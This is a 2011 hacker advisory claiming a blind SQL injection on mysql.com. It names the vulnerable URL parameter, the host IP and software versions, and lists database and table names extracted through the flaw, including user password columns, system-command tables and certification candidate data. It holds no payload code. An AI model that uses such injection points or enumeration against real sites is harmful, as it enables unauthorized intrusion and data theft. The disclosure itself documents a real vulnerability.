
MySQL.com Blind SQL Injection

Posted Mar 27, 2011
Authored by Jackh4xor

MySQL.com suffered from a remote blind SQL injection vulnerability.

tags | advisory, remote, sql injection
SHA-256 | c12cb947f8d7991ebab12da7bd232f56b1ba2144aa99196a42cfff37298a17fb

---------------------------------------------------------------------------------------
[+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
[+] Author: Jackh4xor @ w4ck1ng
[+] Site: http://www.jackh4xor.com
---------------------------------------------------------------------------------------

About MySQL.com :
--------------------------------------------------------------------------------------------------------------------

The MySQL website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services, and production support. The wide range of products includes MySQL clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and, last but not least, MaxDB, the open source database certified for SAP/R3. MySQL services are also available: choose among MySQL training for database solutions, MySQL certification for developers and DBAs, and MySQL consulting and support. Whether you are new to database technology or a skilled developer or DBA, MySQL offers services of all sorts for its customers.
--------------------------------------------------------------------------------------------------------------------



Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
Host IP : 213.136.52.29
Web Server : Apache/2.2.15 (Fedora)
Powered-by : PHP/5.2.13
Injection Type : MySQL Blind
Current DB : web

lead_routing_rule
lead_rep
lead_old
lead_note
lead_extra_old
lead_extra_new
lead_extra
lead_companies
lead_campaign_member
lead
language_strings
language_modules
imagecache
hall_of_fame
g_search_term
g_search_data
g_blog_data
forum_comment
forms
field_xref
field_options
field_match
email_blacklist
email_a_friend
drpl_manual_review
drpl_denied
drpl_check_log
drpl_cache
customer_meta_sets
customer_meta_set
customer_meta
customer
coupon_product
coupon_campaign_attribute
coupon_campaign
coupon
country
countries
campaign_type
campaign_topic
campaign_score
campaign_listdata
campaign_detail
business
bounces

Database : mysql
Table:

user_info

user Column: Update_pri Insert_priv Select_priv Password User Host

time_zone_transition_type
time_zone_transition
time_zone_name
time_zone_leap_second
time_zone
tables_priv
slow_log
servers
procs_priv
proc
plugin
ndb_binlog_index
inventory
host
help_topic
help_relation
help_keyword
help_category
general_log
func
event
db
columns_priv


# mysql.user Data


Database: web_control

Table:
system
system_command
service_request
run_control
request_daemon
rebuild_server
rebuild_queue
rebuild_control
quarterly_lead_report
newsletter_log
newsletter_control
ips
hosts Columns: notes description name
dns_servers Columns: name internal ip


Database: certification

Tables:
signup
corpcustomers
certexamdata
certcandidatedata
certaccess


Database: wordpress

Tables:

wp_4_term_taxonom
wp_4_term_relationships
wp_4_posts
wp_4_postmeta
wp_4_options
wp_4_links
wp_4_comments
wp_3_terms
wp_3_term_taxonomy
wp_3_term_relationships
wp_3_posts
wp_3_postmeta
wp_3_options
wp_3_links
wp_3_comments
wp_2_terms
wp_2_term_taxonomy
wp_2_term_relationships
wp_2_posts
wp_2_postmeta
wp_2_options
wp_2_links
wp_2_comments
wp_1_terms
wp_1_term_taxonomy
wp_1_term_relationships
wp_1_posts
wp_1_postmeta
wp_1_options
wp_1_links
wp_1_comments
wp_11_terms
wp_11_term_taxonomy
wp_11_term_relationships
wp_11_posts
wp_11_postmeta
wp_11_options
wp_11_links
wp_11_comments
wp_10_terms
wp_10_term_taxonomy
wp_10_term_relationships
wp_10_posts
wp_10_postmeta
wp_10_options
wp_10_links
wp_10_comments
remove_queries



Database: bk

Table:
wp_backupterm_taxonomy
wp_backupterm_relationships
wp_backupposts
wp_backuppostmeta
wp_backupoptions
wp_backuplinks
wp_backupcomments


-----------------------------------------------------------------------------------
Signed : Jackh4xor !

Greetz : rooto, Mr.52, zone-hacker, w4ck1ng

(In)Security
-------------------------------------------------------------------------------------